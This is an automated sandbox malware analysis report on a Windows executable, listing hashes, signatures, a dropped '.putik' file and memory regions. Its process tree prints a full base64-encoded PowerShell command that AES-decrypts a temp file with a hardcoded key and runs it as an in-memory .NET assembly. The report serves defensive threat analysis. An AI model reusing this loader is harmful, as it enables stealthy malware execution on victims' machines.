Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    18/05/2024, 18:34

General

  • Target

    file.exe

  • Size

    1.0MB

  • MD5

    e77cf047d33d9bed9d10494ed11c68f1

  • SHA1

    b6dfe123d998dc453d4263b5876414d1825a07a8

  • SHA256

    1b3bc0613f79431889a1452b050b467ab0c5eabe979c6278f73982ff5f5a4b00

  • SHA512

    b8797aec5bda5fae2b0423c53106dd2c6d3770fb9a72d7d6997a6741353a9fb6634e6c0a468655fe98efd0e0eddd73831b0ad56d3a40948c006ad2f6096ed52d

  • SSDEEP

    24576:V74FSZ6wPMZ82ZtSgSJDuyWqM5Wb+EjbL:148ACMZ82ZkgDyo2Jr

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:992
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEYARQAsACAAMAB4ADYAMwAsACAAMAB4AEYAOQAsACAAMAB4ADUAMAAsACAAMAB4AEUAQgAsACAAMAB4ADgAMwAsACAAMAB4AEQAMQAsACAAMAB4ADcAQgAsACAAMAB4ADUAQgAsACAAMAB4AEUANQAsACAAMAB4AEUANAAsACAAMAB4ADYAMAAsACAAMAB4AEMANQAsACAAMAB4AEQARQAsACAAMAB4ADQAQgAsACAAMAB4ADgAQQAsACAAMAB4ADQAMAAsACAAMAB4ADgANAAsACAAMAB4AEMAMgAsACAAMAB4ADUAMgAsACAAMAB4AEIANwAsACAAMAB4ADgAMAAsACAAMAB4AEMAQQAsACAAMAB4ADEARAAsACAAMAB4ADEANgAsACAAMAB4ADQARAAsACAAMAB4AEIAQQAsACAAMAB4ADEANwAsACAAMAB4ADUANAAsACAAMAB4AEIAQQAsACAAMAB4AEQAOAAsACAAMAB4ADEARQApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA4ADUALAAgADAAeAA3ADMALAAgADAAeAAxADUALAAgADAAeAAyAEQALAAgADAAeABCADYALAAgADAAeAA0ADEALAAgADAAeABGADMALAAgADAAeAA1AEYALAAgADAAeABBAEIALAAgADAAeAA5AEUALAAgADAAeAAzADEALAAgADAAeABFAEIALAAgADAAeAA0ADIALAAgADAAeAAyADIALAAgADAAeAAwADMALAAgADAAeAAxADAAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2488

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\file-3149.putik

          Filesize

          34KB

          MD5

          ecfb449e8dadccead6b47a2220c41c14

          SHA1

          8ef0963d700c21da79b27375fec8b0c08b129b6d

          SHA256

          493036aba776c7aa127feb9fc3b2c9587bd7cc7491a6b133ececc471c0f06bfb

          SHA512

          46e8bc24f9a7ace6e6fc6c805b29bda090e3a6553b4dfb6092c64033e1770e3b1ca3d14be033255b7048d6a95320e2fd527eeaca132261f422015bb197334f22

        • memory/2488-5-0x000007FEF5ECE000-0x000007FEF5ECF000-memory.dmp

          Filesize

          4KB

        • memory/2488-6-0x000000001B520000-0x000000001B802000-memory.dmp

          Filesize

          2.9MB

        • memory/2488-7-0x0000000002790000-0x0000000002798000-memory.dmp

          Filesize

          32KB

        • memory/2488-8-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

          Filesize

          9.6MB

        • memory/2488-9-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

          Filesize

          9.6MB

        • memory/2488-10-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

          Filesize

          9.6MB

        • memory/2488-11-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

          Filesize

          9.6MB

        • memory/2488-12-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

          Filesize

          9.6MB

        • memory/2488-14-0x0000000002910000-0x000000000291C000-memory.dmp

          Filesize

          48KB

        • memory/2488-15-0x000007FEF5C10000-0x000007FEF65AD000-memory.dmp

          Filesize

          9.6MB